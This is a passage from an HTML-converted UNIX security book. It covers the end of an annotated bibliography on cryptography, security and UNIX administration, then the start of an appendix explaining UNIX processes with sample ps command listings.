sites with a significant PC population, however. The publication also sponsors a yearly conference that<br />

has good papers on viruses. http://www.virusbtn.com.<br />

D.1.5 Cryptography Books<br />

Bamford, James. The Puzzle Palace: A Report on America's Most <strong>Sec</strong>ret Agency. Boston, MA: Houghton<br />

Mifflin, 1982. The complete, inside story of the National <strong>Sec</strong>urity Agency.<br />

Denning, Dorothy E. R. Cryptography and Data <strong>Sec</strong>urity. Reading, MA: Addison-Wesley, 1983. The<br />

classic textbook in the field.<br />

Garfinkel, Simson. PGP: Pretty Good Privacy. Sebastopol, CA: <strong>O'Reilly</strong> & Associates, 1994. Describes<br />

the history of cryptography, the history of the program PGP, and explains the PGP's use.<br />

Hinsley, F.H., and Alan Stripp. Code Breakers: The Inside Story of Bletchley Park. Oxford, England:<br />

Oxford University Press, 1993.<br />

Hodges, Andrew. Alan Turing: The Enigma. New York, NY: Simon & Schuster, Inc., 1983. The<br />

definitive biography of the brilliant scientist who broke "Enigma," Germany's deepest World War II<br />

secret; who pioneered the modern computer age; and who finally fell victim to the Cold War world of<br />

military secrets and sex scandals.<br />

Hoffman, Lance J. Building in Big Brother: The Cryptographic Policy Debate. New York, NY:<br />

Springer-Verlag, 1995. An interesting collection of papers and articles about the Clipper Chip, Digital<br />

Telephony legislation, and public policy on encryption.<br />

Kahn, David. The Codebreakers. New York, NY: Macmillan Company, 1972. The definitive history of<br />

cryptography prior to the invention of public key.<br />

Kahn, David. Seizing the Enigma: The Race to Break the German U-Boat Codes, 1939-1943. Boston,<br />

MA: Houghton Mifflin, 1991.<br />

Merkle, Ralph. <strong>Sec</strong>recy, Authentication and Public Key Systems. Ann Arbor, MI: UMI Research Press,<br />

1982.<br />

Schneier, Bruce. Applied Cryptography: Protocols, Algorithms, and Source Code in C. <strong>Sec</strong>ond edition.<br />

New York, NY: John Wiley & Sons, 1996. The most comprehensive, unclassified book about computer<br />

encryption and data-privacy techniques ever published.<br />

Simmons, G.J., ed. Contemporary Cryptology: The Science of Information Integrity. New York, NY:<br />

IEEE Press, 1992.<br />

Smith, Laurence Dwight. Cryptography: The Science of <strong>Sec</strong>ret Writing. New York, NY: Dover<br />

Publications, 1941.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appd_01.htm (4 of 11) [2002-04-12 10:45:17]


[Appendix D] Paper Sources<br />

D.1.6 Cryptography Papers and Other Publications<br />

Association for Computing Machinery. "Codes, Keys, and Conflicts: Issues in U.S. Crypto Policy."<br />

Report of a Special Panel of the ACM U.S. Public Policy Committee location: USACM, June 1994.<br />

(URL: http://info.acm.org/reports/acm_crypto_study.html)<br />

Coppersmith, Don. IBM Journal of Research and Development 38 (1994).<br />

Diffie, Whitfield. "The First Ten Years of Public-Key Cryptography." Proceedings of the IEEE 76<br />

(1988): 560-76. Whitfield Diffie's tour-de-force history of public key cryptography, with revealing<br />

commentaries.<br />

Diffie, Whitfield, and M.E. Hellman. "New Directions in Cryptography." IEEE Transactions on<br />

Information Theory IT-22 (1976). The article that introduced the concept of public key cryptography.<br />

Hoffman, Lance J., Faraz A. Ali, Heckler, Steven L. and Ann Huybrechts. "Cryptography Policy."<br />

Communications of the ACM 37 (1994): 109-17.<br />

Lai, Xuejia. "On the Design and <strong>Sec</strong>urity of Block Ciphers." ETH Series in Information Processing 1<br />

(1992). The article describing the IDEA cipher.<br />

Lai, Xuejia, and James L. Massey. "A Proposal for a New Block Encryption Standard." Advances in<br />

Cryptology-EUROCRYPT '90 Proceedings (1992): 55-70. Another article describing the IDEA cipher.<br />

LaMacchia, Brian A. and Andrew M. Odlyzko. "Computation of Discrete Logarithms in Prime Fields."<br />

Designs, Codes, and Cryptography. (1991):, 46-62.<br />

Lenstra, A.K., H. W. Lenstra, Jr., M.S. Manasse, and J.M. Pollard. "The Number Field Sieve."<br />

Proceedings of the 22nd ACM Symposium on the Theory of Computing. Baltimore MD: ACM Press,<br />

1990, 564-72.<br />

Lenstra, A.K., Lenstra, Jr., H.W., Manasse, M.S., and J.M. Pollard. "The Factorization of the Ninth<br />

Fermat Number." Mathematics of Computation 61 (1993): 319-50.<br />

Merkle, Ralph. "<strong>Sec</strong>ure Communication Over Insecure Channels." Communications of the ACM 21<br />

(1978): 294-99 (submitted in 1975). The article that should have introduced the concept of public key<br />

cryptography.<br />

Merkle, Ralph, and Martin E. Hellman. "On the <strong>Sec</strong>urity of Multiple Encryption." Communications of<br />

the ACM 24 (1981): 465-67.<br />

Merkle, Ralph, and Martin E. Hellman. "Hiding Information and Signatures in Trap Door Knapsacks."<br />

IEEE Transactions on Information Theory 24 (1978): 525-30.<br />

National Bureau of Standards. Data Encryption Standard 1987.(FIPS PUB 46-1)<br />

Rivest, Ron. Ciphertext: The RSA Newsletter 1 (1993).<br />

Rivest, Ron, A. Shamir, and L. Adleman. "A Method for Obtaining Digital Signatures and Public Key<br />

Cryptosystems." Communications of the ACM 21 (1978).<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appd_01.htm (5 of 11) [2002-04-12 10:45:18]


[Appendix D] Paper Sources<br />

Simmons, G. J. "How to Insure that Data Acquired to Verify Treaty Compliance are Trustworthy." in<br />

"Authentication without secrecy: A secure communications problem uniquely solvable by asymmetric<br />

encryption techniques." IEEE EASCON '79, (1979): 661-62.<br />

D.1.7 General Computer <strong>Sec</strong>urity<br />

Amoroso, Edward. Fundamentals of Computer <strong>Sec</strong>urity Technology. Englewood Cliffs, NJ:<br />

Prentice-Hall, 1994. A very readable and complete introduction to computer security at the level of a<br />

college text.<br />

Carroll, John M. Computer <strong>Sec</strong>urity. 2nd edition, Stoneham, MA: Butterworth Publishers, 1987.<br />

Contains an excellent treatment of issues in physical communications security.<br />

Computers & <strong>Sec</strong>urity. This is a journal published eight times each year by Elsevier Press, Oxford,<br />

England. (Order from Elsevier Press, +44-(0) 865-512242.) It is one of the main journals in the field.<br />

This journal is priced for institutional subscriptions, not individuals. Each issue contains pointers to<br />

dozens of other publications and organizations that might be of interest, as well as referenced articles,<br />

practicums, and correspondence. The URL for the WWW page is included in "<strong>Sec</strong>urity Periodicals."<br />

Computer <strong>Sec</strong>urity Requirements - Guidance for Applying the Department of Defense Trusted Computer<br />

System Evaluation Criteria in Specific Environments, Fort George G. Meade, MD: National Computer<br />

<strong>Sec</strong>urity Center, 1985. (Order number CSC-STD-003-85.) (The Yellow Book)<br />

Datapro Reports on Computer <strong>Sec</strong>urity. Delran, NJ: McGraw-Hill. (Order from Datapro, 609-764-0100.)<br />

An ongoing (and expensive) series of reports on various issues of security, including legislation trends,<br />

new products, items in the news, and more. Practitioners are divided on the value of this publication, so<br />

check it out carefully before you buy it to see if it is useful in your situation.<br />

Department of Defense Password Management Guideline. Fort George G. Meade, MD: National<br />

Computer <strong>Sec</strong>urity Center, 1985. (Order number CSC-STD-002-85.) (The Green Book)<br />

Department of Defense Trusted Computer System Evaluation Criteria. Fort George G. Meade, MD:<br />

National Computer <strong>Sec</strong>urity Center, 1985. (Order number DoD 5200.28-STD.) (The Orange Book)<br />

Fites, P. E., M. P. J. Kratz, and A. F. Brebner. Control and <strong>Sec</strong>urity of Computer Information Systems.<br />

Rockville, MD: Computer Science Press, 1989. A good introduction to the administration of security<br />

policy and not techniques.<br />

Gasser, Morrie. Building a <strong>Sec</strong>ure Computer System. New York, NY: Van Nostrand Reinhold, 1988. A<br />

solid introduction to issues of secure system design.<br />

Hunt, A. E., S. Bosworth, and D. B. Hoyt, eds. Computer <strong>Sec</strong>urity Handbook, 3rd edition. New York,<br />

NY: Wiley, 1995. A massive and thorough collection of essays on all aspects of computer security.<br />

National Research Council, Computers at Risk: Safe Computing in the Information Age. Washington,<br />

DC: National Academy Press, 1991. (Order from NRC, 1-800-624-6242.) This book created considerable<br />

comment. It's a report of a panel of experts discussing the need for national concern and research in the<br />

areas of computer security and privacy. Some people think it is a significant publication, while others<br />

believe it has faulty assumptions and conclusions. Either way, you should probably read it.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appd_01.htm (6 of 11) [2002-04-12 10:45:18]


[Appendix D] Paper Sources<br />

Pfleeger, Charles P. <strong>Sec</strong>urity in Computing. Englewood Cliffs, NJ: Prentice-Hall, 1989. Another good<br />

introduction to computer security.<br />

Russell, Deborah, and G. T. Gangemi, Sr. Computer <strong>Sec</strong>urity Basics. Sebastopol, CA: <strong>O'Reilly</strong> &<br />

Associates, 1991. An excellent introduction to many areas of computer security and a summary of<br />

government security requirements and issues.<br />

Thompson, Ken. "Reflections on Trusting Trust" Communications of the ACM, Volume 27, Number 8,<br />

August (1984). This is a "must-read" for anyone seeking to understand the limits of computer security<br />

and trust.<br />

Wood, Charles Cresson, et al. Computer <strong>Sec</strong>urity: A Comprehensive Controls Checklist, New York, NY:<br />

John Wiley & Sons, 1987. Contains many comprehensive and detailed checklists for assessing the state<br />

of your own computer security and operations.<br />

Wood, Charles Cresson. Information <strong>Sec</strong>urity Policies Made Easy. Sausalito, CA: Baseline Software,<br />

1994. This book and accompanying software allow the reader to construct a corporate security policy<br />

using hundreds of components listed in the book. Pricey, but worth it if you need to write a<br />

comprehensive policy:<br />

Baseline Software<br />

PO Box 1219<br />

Sausalito, CA 94966-1219<br />

++1 415-332-7763<br />

D.1.8 Network Technology and <strong>Sec</strong>urity<br />

Bellovin, Steve and Cheswick, Bill. Firewalls and <strong>Internet</strong> <strong>Sec</strong>urity. Reading, MA: Addison-Wesley,<br />

1994. The classic book on firewalls. This book will teach you everything you need to know about how<br />

firewalls work, but it will leave you without implementation details unless you happen to have access to<br />

the full source code to the <strong>UNIX</strong> operating system and a staff of programmers who can write bug-free<br />

code.<br />

Chapman, D. Brent, and Elizabeth D. Zwicky. Building <strong>Internet</strong> Firewalls. Sebastopol, CA: <strong>O'Reilly</strong> &<br />

Associates, 1995. A good how-to book that describes in clear detail how to build your own firewall.<br />

Comer, Douglas E. <strong>Internet</strong>working with TCP/IP. 3rd Edition. Englewood Cliffs, NJ: Prentice Hall,<br />

1995. A complete, readable reference that describes how TCP/IP networking works, including<br />

information on protocols, tuning, and applications.<br />

Frey, Donnalyn, and Rick Adams. !%@:: A Directory of Electronic Mail Addressing and Networks,<br />

Sebastopol, CA: <strong>O'Reilly</strong> & Associates, 1990. This guide is a complete reference to everything you<br />

would ever want to know about sending electronic mail. It covers addressing and transport issues for<br />

almost every known network, along with lots of other useful information to help you get mail from here<br />

to there. Highly recommended.<br />

Hunt, Craig. TCP/IP Network Administration. Sebastopol, CA: <strong>O'Reilly</strong> & Associates, 1992. This book<br />

is an excellent system administrator"s overview of TCP/IP networking (with a focus on <strong>UNIX</strong> systems),<br />

and a very useful reference to major <strong>UNIX</strong> networking services and tools such as BIND (the standard<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appd_01.htm (7 of 11) [2002-04-12 10:45:18]


[Appendix D] Paper Sources<br />

<strong>UNIX</strong> DNS Server) and sendmail (the standard <strong>UNIX</strong> SMTP Server).<br />

Kaufman, Charles, Radia Perlman, and Mike Speciner. Network <strong>Sec</strong>urity: Private Communications in a<br />

Public World. Englewood Cliffs, NJ: Prentice-Hall, 1995.<br />

Liu, Cricket, Jerry Peek, Russ Jones, Bryan Buus, and Adrian Nye. Managing <strong>Internet</strong> Information<br />

Services, Sebastopol, CA: <strong>O'Reilly</strong> & Associates, 1994. This is an excellent guide to setting up and<br />

managing <strong>Internet</strong> services such as the World Wide Web, FTP, Gopher, and more, including discussions<br />

of the security implications of these services.<br />

Stallings, William. Network and <strong>Internet</strong>work <strong>Sec</strong>urity: Principles and Practice. Englewood Cliffs, NJ:<br />

Prentice Hall, 1995. A good introductory textbook.<br />

Stevens, Richard W. TCP/IP Illustrated. The Protocols, Volume 1. Reading, MA: Addison-Wesley,<br />

1994. This is a good guide to the nuts and bolts of TCP/IP networking. Its main strength is that it<br />

provides traces of the packets going back and forth as the protocols are actually in use, and uses the<br />

traces to illustrate the discussions of the protocols.<br />

Quarterman, John. The Matrix: Computer Networks and Conferencing Systems Worldwide. Bedford,<br />

MA: Digital Press, 1990. A dated but still insightful book describing the networks, protocols, and politics<br />

of the world of networking.<br />

D.1.9 <strong>Sec</strong>urity Products and Services Information<br />

Computer <strong>Sec</strong>urity Buyer's Guide. Computer <strong>Sec</strong>urity Institute, San Francisco, CA. (Order from CSI,<br />

415-905-2626.) Contains a comprehensive list of computer security hardware devices and software<br />

systems that are commercially available. The guide is free with membership in the Institute. The URL is<br />

at http://www.gocsi.com.<br />

D.1.10 Understanding the Computer <strong>Sec</strong>urity "Culture"<br />

All of these describe views of the future and computer networks that are much discussed (and emulated)<br />

by system crackers.<br />

Brunner, John. Shockwave Rider. New York, NY: A Del Ray Book, published by Ballantine, 1975. One<br />

of the first descriptions of a computer worm.<br />

Gibson, William. Burning Chrome, Count Zero, Mona Lisa Overdrive, and Neuromancer New York,<br />

NY: Bantam Books These four cyberpunk books by the science fiction author who coined the term<br />

"cyberspace."<br />

Hafner, Katie and John Markoff, Cyberpunk: Outlaws and Hackers on the Computer Frontier. New<br />

York, NY: Simon and Schuster, 1991. Tells the stories of three hackers - Kevin Mitrick, Pengo, and<br />

Robert T. Morris.<br />

Levy, Steven. Hackers: Heroes of the Computer Revolution. New York, NY: Dell Books, 1984. One of<br />

the original publications describing the "hacker ethic."<br />

Littman, Jonathan, The Fugitive Game: Online with Kevin Mitnick. Boston, MA: Little, Brown, 1996. A<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appd_01.htm (8 of 11) [2002-04-12 10:45:18]


[Appendix D] Paper Sources<br />

year prior to his capture in 1995, Jonathan Littman had extensive telephone conversations with Kevin<br />

Mitnick and learned what it is like to be a computer hacker on the run. This is the story.<br />

Shimomura, Tsutomu, with John Markoff. Takedown: The Pursuit and Capture of Kevin Mitnick,<br />

America's Most Wanted Computer Outlaw---By the Man Who Did it. New York, NY: Hyperion, 1995.<br />

On Christmas Day, 1994, an attacker broke into Tsutomu Shimomura's computer. A few weeks later,<br />

Shimomura was asked to help out with a series of break-ins at two major <strong>Internet</strong> service providers in the<br />

San Fransisco area. Eventually, the trail led to North Carolina, where Shimomura participated in the<br />

tracking and capture of Kevin Mitnick. This is the story, written by Shimomura and Markoff. Markoff is<br />

the journalist with The New York Times who covered the capture.<br />

Sterling, Bruce. The Hacker Crackdown: Law and Disorder on the Electronic Frontier. This book is<br />

available in several places on the WWW; http://www-swiss.ai.mit.edu/~bal/sterling/contents.html is one<br />

location; other locations can be found in the COAST hotlist.<br />

Stoll, Cliff. The Cuckoo's Egg, Garden City, NY: Doubleday, 1989. An amusing and gripping account of<br />

tracing a computer intruder through the networks. The intruder was later found to be working for the<br />

KGB and trying to steal sensitive information from U.S. systems.<br />

Varley, John. Press Enter. Reprinted in several collections of science fiction, including Blue Champagne,<br />

Ace Books, 1986; Isaac Asimov's Science Fiction Magazine, 1984; and Tor SF Doubles, October, Tor<br />

Books, 1990.<br />

Vinge, Vernor. True Names and Other Dangers. New York, NY: Baen, distributed by Simon & Schuster,<br />

1987.<br />

D.1.11 <strong>UNIX</strong> Programming and System Administration<br />

Albitz, Paul and Cricket Liu. DNS and BIND. Sebastopol, CA: <strong>O'Reilly</strong> & Associates, 1992. An<br />

excellent reference for setting up DNS nameservers.<br />

Bach, Maurice. The Design of the <strong>UNIX</strong> Operating System. Englewood Cliffs, NJ: Prentice-Hall, 1986.<br />

Good background about how the internals of <strong>UNIX</strong> work. Basically oriented toward older System V<br />

<strong>UNIX</strong>, but with details applicable to every version.<br />

Bolsky, Morris I., and David G. Korn. The New Kornshell Command and Programming Language.<br />

Englewood Cliffs, NJ: Prentice-Hall, 1995. This is a complete tutorial and reference to the 1992 ksh - the<br />

only shell some of us use when given the choice.<br />

Costales, Bryan, with Eric Allman and Neil Rickert. sendmail. Sebastopol, CA: <strong>O'Reilly</strong> & Associates,<br />

1993. Rightly or wrongly, many <strong>UNIX</strong> sites continue to use the sendmail mail program. This huge book<br />

will give you tips on configuring it more securely.<br />

Goodheart, B. and J. Cox. The Magic Garden Explained: The Internals of <strong>UNIX</strong> SVR4. Englewood<br />

Cliffs, N.J.: Prentice-Hall, 1994<br />

Harbison, Samuel P. and Guy L. Steele Jr., C, a Reference Manual. Englewood Cliffs, NJ: Prentice Hall,<br />

1984.<br />

Hu, Wei. DCE <strong>Sec</strong>urity Programming. Sebastopol, CA: <strong>O'Reilly</strong> & Associates, 1995.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appd_01.htm (9 of 11) [2002-04-12 10:45:18]


[Appendix D] Paper Sources<br />

Kernighan, Brian, Dennis Ritchie and Rob Pike. The <strong>UNIX</strong> Programming Environment. Englewood<br />

Cliffs, NJ: Prentice-Hall, 1984. A nice guide to the <strong>UNIX</strong> philosophy and how to build shell scripts and<br />

command environments under <strong>UNIX</strong>.<br />

Leffler, Samuel, Marshall Kirk McKusick, Michael Karels, and John Quarterman. The Design and<br />

Implementation of the 4.3 BSD <strong>UNIX</strong> Operating System. Reading, MA: Addison Wesley, 1989. This<br />

book can be viewed as the BSD version of Maurice Bach's book. It is a readable and detailed description<br />

of how and why the BSD <strong>UNIX</strong> system is designed the way it is. (An updated version covering BSD 4.4<br />

is rumored to be in production, to appear after publication of this edition.)<br />

Nemeth, Evi, Garth Snyder, Scott Seebass, and Trent R. Hein. <strong>UNIX</strong> System Administration Handbook.<br />

2nd Edition. Englewood Cliffs, NJ: Prentice-Hall, 1995. An excellent reference on the various ins and<br />

outs of running a <strong>UNIX</strong> system. This book includes information on system configuration, adding and<br />

deleting users, running accounting, performing backups, configuring networks, running sendmail, and<br />

much more. Highly recommended.<br />

<strong>O'Reilly</strong>, Tim, and Grace Todino. Managing UUCP and Usenet. Sebastopol CA: <strong>O'Reilly</strong> & Associates,<br />

1992. If you run UUCP on your machine, you need this book. It discusses all the various intricacies of<br />

running the various versions of UUCP. Included is material on setup and configuration, debugging<br />

connections, and accounting. Highly recommended.<br />

Peek, Jerry et al. <strong>UNIX</strong> Power Tools, Sebastopol, CA: <strong>O'Reilly</strong> & Associates, 1993.<br />

Ramsey, Rick. All About Administering NIS+. Englewood Cliffs, NJ: Prentice-Hall, 1994.<br />

Rochkind, Marc. Advanced <strong>UNIX</strong> Programming. Englewood Cliffs, NJ: Prentice-Hall, 1985. This book<br />

has easy-to-follow introduction to various system calls in <strong>UNIX</strong> (primarily System V) and explains how<br />

to use them from C programs. If you are administering a system and reading or writing system-level<br />

code, this book is a good way to get started, but keep in mind that this is rather dated.<br />

Stevens, W. Richard. Advanced Programming in the <strong>UNIX</strong> Environment. Reading, MA:<br />

Addison-Wesley, 1992.<br />

D.1.12 Miscellaneous References<br />

Hawking, Stephen W. A Brief History of Time: From the Big Bang to Black Holes, New York, NY:<br />

Bantam Books, 1988. Want to find the age of the universe? It's in here, but <strong>UNIX</strong> is not.<br />

Miller, Barton P., Lars Fredriksen, and Bryan So. "An Empirical Study of the Reliability of <strong>UNIX</strong><br />

Utilities," Communications of the ACM, Volume 33, Number 12, December 1990, 32-44. A<br />

thought-provoking report of a study showing how <strong>UNIX</strong> utilities behave when given unexpected input.<br />

Wall, Larry, and Randal L. Schwartz. Programming perl, Sebastopol, CA: <strong>O'Reilly</strong> & Associates, 1991.<br />

The definitive reference to the Perl scripting language. A must for anyone who does much shell, awk, or<br />

sed programming or would like to quickly write some applications in <strong>UNIX</strong>.<br />

Wall, Larry and Randal L. Schwartz. Learning perl, Sebastopol, CA: <strong>O'Reilly</strong> & Associates, 1993.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appd_01.htm (10 of 11) [2002-04-12 10:45:18]


[Appendix D] Paper Sources<br />

C.5 Starting Up <strong>UNIX</strong> and<br />

Logging In<br />

D.2 <strong>Sec</strong>urity Periodicals<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appd_01.htm (11 of 11) [2002-04-12 10:45:18]


[Appendix C] <strong>UNIX</strong> Processes<br />

Appendix C<br />

C. <strong>UNIX</strong> Processes<br />

Contents:<br />

About Processes<br />

Creating Processes<br />

Signals<br />

The kill Command<br />

Starting Up <strong>UNIX</strong> and Logging In<br />

This appendix provides technical background on how the <strong>UNIX</strong>operating system manages processes. The information presented in<br />

this chapter is important to understand if you are concerned with the details of system administration or are simply interested in<br />

<strong>UNIX</strong> internals, but we felt that it was too technical to present early in this book.<br />

C.1 About Processes<br />

<strong>UNIX</strong> is a multitasking operating system. Every task that the computer is performing at any moment - every user running a word<br />

processor program, for example - has a process. The process is the operating system's fundamental tool for controlling the computer.<br />

Nearly everything that <strong>UNIX</strong> does is done with a process. One process displays the word login: on the user's terminal and reads the<br />

characters that the user types to log into the system. Another process controls the line printer. On a workstation, a special process<br />

called the "window server" displays text in windows on the screen. Another process called the "window manager" lets the user move<br />

those windows around.<br />

At any given moment, the average <strong>UNIX</strong> operating system might be running anywhere from ten to several hundred different<br />

processes; large mainframes might be running several thousand. <strong>UNIX</strong> runs at least one process for every user who is logged in,<br />

another process for every program that every user is running, and another process for every hard-wired terminal that is waiting for a<br />

new user to log in. <strong>UNIX</strong> also uses a variety of special processes for system functions.<br />

C.1.1 Processes and Programs<br />

A process is an abstraction of control that has certain special properties associated with it. These include a private stack, values of<br />

registers, a program counter, an address space containing program code and data, and so on. The underlying hardware and operating<br />

system software manage the contents of registers in such a way that each process views the computer's resources as its "own" while it<br />

is running. With a single processor, only one process at a time is actually running, with the operating system swapping processes<br />

from time to time to give the illusion that they are all running concurrently. Multi-processor computers can naturally run several<br />

processes with true synchronicity.<br />

Every <strong>UNIX</strong> process has a program that it is running, even if that program is part of the <strong>UNIX</strong> operating system (a special program).<br />

Programs are usually referred to by the names of the files in which they are kept. For example, the program that lists files is called<br />

/bin/ls and the program that runs the line printer may be called /usr/lib/lpd.<br />

A process can run a program that is not stored in a file in either of two ways:<br />

●<br />

●<br />

The program's file can be deleted after its process starts up. In this case, the process's program is really stored in a file, but the<br />

file no longer has a name and cannot be accessed by any other processes. The file is deleted automatically when the process<br />

exits or runs another program.<br />

The process may have been specially created in the computer's memory. This is the method that the <strong>UNIX</strong> kernel uses to begin<br />

the first process when the operating system starts up. This usually happens only at start-up, but some programming languages<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appc_01.htm (1 of 7) [2002-04-12 10:45:19]


[Appendix C] <strong>UNIX</strong> Processes<br />

such as LISP can load additional object modules as they are running.<br />

Normally, processes run a single program and then exit. However, a program can cause another program to be run. In this case, the<br />

same process starts running another program.<br />

C.1.2 The ps Command<br />

The ps command gives you a snapshot of all of the processes running at any given moment. ps tells you who is running programs on<br />

your system, as well as which programs the operating system is spending its time executing.<br />

Most system administrators routinely use the ps command to see why their computers are running so slowly; system administrators<br />

should also regularly use the command to look for suspicious processes. (Suspicious processes are any processes that you don't<br />

expect to be running. Methods of identifying suspicious processes are described in detail in earlier chapters.)<br />

C.1.2.1 Listing processes with systems derived from System V<br />

The System V ps command will normally only print the processes that are associated with the terminal on which the program is being<br />

run. To list all of the processes that are running on your computer, you must run the program with the -ef options. The options are:<br />

Option Effect<br />

e List all processes<br />

f Produce a full listing<br />

For example:<br />

sun.vineyard.net% /bin/ps -ef<br />

UID PID PPID C STIME TTY TIME COMD<br />

root 0 0 64 Nov 16 ? 0:01 sched<br />

root 1 0 80 Nov 16 ? 9:56 /etc/init -<br />

root 2 0 80 Nov 16 ? 0:10 pageout<br />

root 3 0 80 Nov 16 ? 78:20 fsflush<br />

root 227 1 24 Nov 16 ? 0:00 /usr/lib/saf/sac -t 300<br />

root 269 1 18 Nov 16 console 0:00 /usr/lib/saf/ttymon -g - root 97<br />

1 80 Nov 16 ? 1:02 /usr/sbin/rpcbind<br />

root 208 1 80 Nov 16 ? 0:01 /usr/dt/bin/dtlogin<br />

root 99 1 21 Nov 16 ? 0:00 /usr/sbin/keyserv<br />

root 117 1 12 Nov 16 ? 0:00 /usr/lib/nfs/statd<br />

root 105 1 12 Nov 16 ? 0:00 /usr/sbin/kerbd<br />

root 119 1 27 Nov 16 ? 0:00 /usr/lib/nfs/lockd<br />

root 138 1 12 Nov 16 ? 0:00 /usr/lib/autofs/automoun root 162<br />

1 62 Nov 16 ? 0:01 /usr/lib/lpsched<br />

root 142 1 41 Nov 16 ? 0:00 /usr/sbin/syslogd<br />

root 152 1 80 Nov 16 ? 0:07 /usr/sbin/cron<br />

root 169 162 8 Nov 16 ? 0:00 lpNet<br />

root 172 1 80 Nov 16 ? 0:02 /usr/lib/sendmail -q1h<br />

root 199 1 80 Nov 16 ? 0:02 /usr/sbin/vold<br />

root 180 1 80 Nov 16 ? 0:04 /usr/lib/utmpd<br />

root 234 227 31 Nov 16 ? 0:00 /usr/lib/saf/listen tcp<br />

simsong 14670 14563 13 12:22:12 pts/11 0:00 rlogin next<br />

root 235 227 45 Nov 16 ? 0:00 /usr/lib/saf/ttymon<br />

simsong 14673 14535 34 12:23:06 pts/5 0:00 rlogin next<br />

simsong 14509 1 80 11:32:43 ? 0:05 /usr/dt/bin/dsdm<br />

simsong 14528 14520 80 11:32:51 ? 0:18 dtwm<br />

simsong 14535 14533 66 11:33:04 pts/5 0:01 /usr/local/bin/tcsh<br />

simsong 14529 14520 80 11:32:56 ? 0:03 dtfile -session dta003TF<br />

root 14467 1 11 11:32:23 ? 0:00 /usr/openwin/bin/fbconso simsong 14635<br />

14533 80 11:48:18 pts/12 0:01 /usr/local/bin/tcsh<br />

simsong 14728 14727 65 15:29:20 pts/9 0:01 rlogin next<br />

root 332 114 80 Nov 16 ? 0:02 /usr/dt/bin/rpc.ttdbserv root 14086<br />

208 80 Dec 01 ? 8:26 /usr/openwin/bin/Xsun :0 simsong 13121 13098 80 Nov<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appc_01.htm (2 of 7) [2002-04-12 10:45:19]


[Appendix C] <strong>UNIX</strong> Processes<br />

29 pts/6 0:01 /usr/local/bin/tcsh<br />

simsong 15074 14635 20 10:48:34 pts/12 0:00 /bin/ps -ef<br />

Table 27.2 describes the meaning of each field in this output.<br />

Field in ps Output (System V)<br />

Table C.1: Feild in ps Output (System V)<br />

Field Meaning<br />

UID The username of the person running the command<br />

PID The process's identification number (see next section)<br />

PPID The process ID of the process's parent process<br />

C The processor utilization; an indication of how much CPU time the process is using at the moment<br />

STIME The time that the process started executing<br />

TTY The controlling terminal for the process<br />

TIME The total amount of CPU time that the process has used<br />

COMD The command that was used to start the process<br />

C.1.2.2 Listing processes with Berkeley-derived versions of <strong>UNIX</strong><br />

With Berkeley <strong>UNIX</strong>, you can use the command:<br />

% ps -auxww<br />

to display detailed information about every process running on your computer. The options specified in this command are:<br />

Option Effect<br />

a List all processes<br />

u Display the information in a user-oriented style<br />

x Include information on processes that do not have controlling ttys<br />

ww Include the complete command lines, even if they run past 132 columns<br />

For example:[1]<br />

[1] Many Berkeley-derived versions also show a start time (START) between STAT and TIME.<br />

% ps -auxww<br />

USER PID %CPU %MEM SZ RSS TT STAT TIME COMMAND<br />

simsong 1996 62.6 0.6 1136 1000 q8 R 0:02 ps auxww<br />

root 111 0.0 0.0 32 16 ? I 1:10 /etc/biod 4<br />

daemon 115 0.0 0.1 164 148 ? S 2:06 /etc/syslog<br />

root 103 0.0 0.1 140 116 ? I 0:44 /etc/portmap<br />

root 116 0.0 0.5 860 832 ? I 12:24 /etc/mountd -i -s<br />

root 191 0.0 0.2 384 352 ? I 0:30 /usr/etc/bin/lpd<br />

root 73 0.0 0.3 528 484 ? S < 7:31 /usr/etc/ntpd -n<br />

root 4 0.0 0.0 0 0 ? I 0:00 tpathd<br />

root 3 0.0 0.0 0 0 ? R 0:00 idleproc<br />

root 2 0.0 0.0 4096 0 ? D 0:00 pagedaemon<br />

root 239 0.0 0.1 180 156 co I 0:00 std.9600 console<br />

root 0 0.0 0.0 0 0 ? D 0:08 swapper<br />

root 178 0.0 0.3 700 616 ? I 6:31 /etc/snmpd<br />

root 174 0.0 0.1 184 148 ? S 5:06 /etc/inetd<br />

root 168 0.0 0.0 56 44 ? I 0:16 /etc/cron<br />

root 132 0.0 0.2 452 352 co I 0:11 /usr/etc/lockd<br />

jdavis 383 0.0 0.1 176 96 p0 I 0:03 rlogin hymie<br />

ishii 1985 0.0 0.1 284 152 q1 S 0:00 /usr/ucb/mail bl<br />

root 26795 0.0 0.1 128 92 ? S 0:00 timed<br />

root 25728 0.0 0.0 136 56 t3 I 0:00 telnetd<br />

jdavis 359 0.0 0.1 540 212 p0 I 0:00 -tcsh (tcsh)<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appc_01.htm (3 of 7) [2002-04-12 10:45:19]


[Appendix C] <strong>UNIX</strong> Processes<br />

root 205 0.0 0.1 216 168 ? I 0:04 /usr/local/cap/atis<br />

kkarahal 16296 0.0 0.4 1144 640 ? I 0:00 emacs<br />

root 358 0.0 0.0 120 44 p0 I 0:03 rlogind<br />

root 26568 0.0 0.0 0 0 ? Z 0:00 <br />

root 10862 0.0 0.1 376 112 ? I 0:00 rshd<br />

The fields in this output are described in Table 27.3. Individual STAT characters are described in Tables C-3, C-4, and C-5.<br />

Table C.2: Fields in ps Output (Berkeley-derived)<br />

Field Meaning<br />

USER The username of the process. If the process has a UID (described in the next section) that does not appear in<br />

/etc/passwd, the UID is printed instead.[2]<br />

PID The process's identification number<br />

